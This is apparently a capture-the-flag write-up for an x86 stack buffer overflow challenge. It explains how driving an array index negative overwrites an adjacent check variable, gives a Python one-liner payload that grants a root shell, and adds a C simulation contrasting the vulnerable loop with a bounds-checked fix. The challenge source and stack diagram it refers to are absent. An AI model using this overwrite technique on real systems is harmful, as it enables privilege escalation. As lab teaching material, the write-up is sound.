roome-ELF x86 - Stack buffer overflow basic 3
2018-01-27 17:36
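Program source code:
The program reads one character at a time from the input stream and compares it, filtering out the characters "\n", 0x04 and 0x90. It uses count as the array index and also limits the amount of input.
The challenge requires changing the value of check to 0xbffffabc, gaining root privileges, and reading passwd.
Note the order in which the local variables are defined in this challenge: buffer->check->i->count
The stack layout should be
Therefore we need to overwrite check, which sits below buffer (note the direction of stack growth). The usual approach of filling buffer cannot do this. Fortunately, count is used as the index into buffer in this challenge, so changing count to -4 lets us overwrite the contents of check.
payload:
python -c 'print "\x08\x08\x08\x08"+"\xbc\xfa\xff\xbf"';cat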
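As an added example (not the challenge's source, which is not reproduced on this page), this C simulation shows why an index that can be decremented below zero reaches check, next to a bounds-checked version of the same loop. The 40-byte buffer size, the rule that each 0x08 byte decrements count, the initial check value and all function names are assumptions made for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define BUF_LEN 40    /* assumed size; the page does not state it */
#define CHECK_LEN 4
/* Simulated frame: mem[0..3] is check, mem[4..] is buffer (check below buffer). */
struct frame { unsigned char mem[CHECK_LEN + BUF_LEN]; int count; };

static void frame_init(struct frame *f, uint32_t check) {
    memset(f, 0, sizeof *f);
    for (int b = 0; b < CHECK_LEN; b++)          /* little-endian, as on x86 */
        f->mem[b] = (unsigned char)(check >> (8 * b));
}

static uint32_t frame_check(const struct frame *f) {
    uint32_t v = 0;
    for (int b = 0; b < CHECK_LEN; b++) v |= (uint32_t)f->mem[b] << (8 * b);
    return v;
}

/* Vulnerable: only the upper bound is tested, so count can go negative. */
static void feed_vulnerable(struct frame *f, const unsigned char *in, size_t n) {
    for (size_t k = 0; k < n && f->count < BUF_LEN; k++) {
        /* assumed: 0x08 decrements count; the clamp keeps the simulation in mem[] */
        if (in[k] == 0x08) { if (f->count > -CHECK_LEN) f->count--; continue; }
        f->mem[CHECK_LEN + f->count++] = in[k];  /* count == -4 lands on check */
    }
}

/* Hardened: count never drops below 0 and every store is range-checked. */
static int feed_hardened(struct frame *f, const unsigned char *in, size_t n) {
    for (size_t k = 0; k < n; k++) {
        if (in[k] == 0x08) { if (f->count > 0) f->count--; continue; }
        if (f->count < 0 || f->count >= BUF_LEN) return -1;  /* reject, no store */
        f->mem[CHECK_LEN + f->count++] = in[k];
    }
    return 0;
}

int main(void) {
    /* the eight bytes of the payload shown above */
    const unsigned char in[] = {0x08, 0x08, 0x08, 0x08, 0xbc, 0xfa, 0xff, 0xbf};
    struct frame v, h;
    frame_init(&v, 0x11223344u);                 /* constructed initial check */
    feed_vulnerable(&v, in, sizeof in);
    frame_init(&h, 0x11223344u);
    feed_hardened(&h, in, sizeof in);
    printf("vulnerable check=0x%08x\n", (unsigned)frame_check(&v));
    printf("hardened   check=0x%08x\n", (unsigned)frame_check(&h));
    return 0;
}
```

The fix is the lower-bound test on count: with it, the same input stays inside buffer and check keeps its initial value.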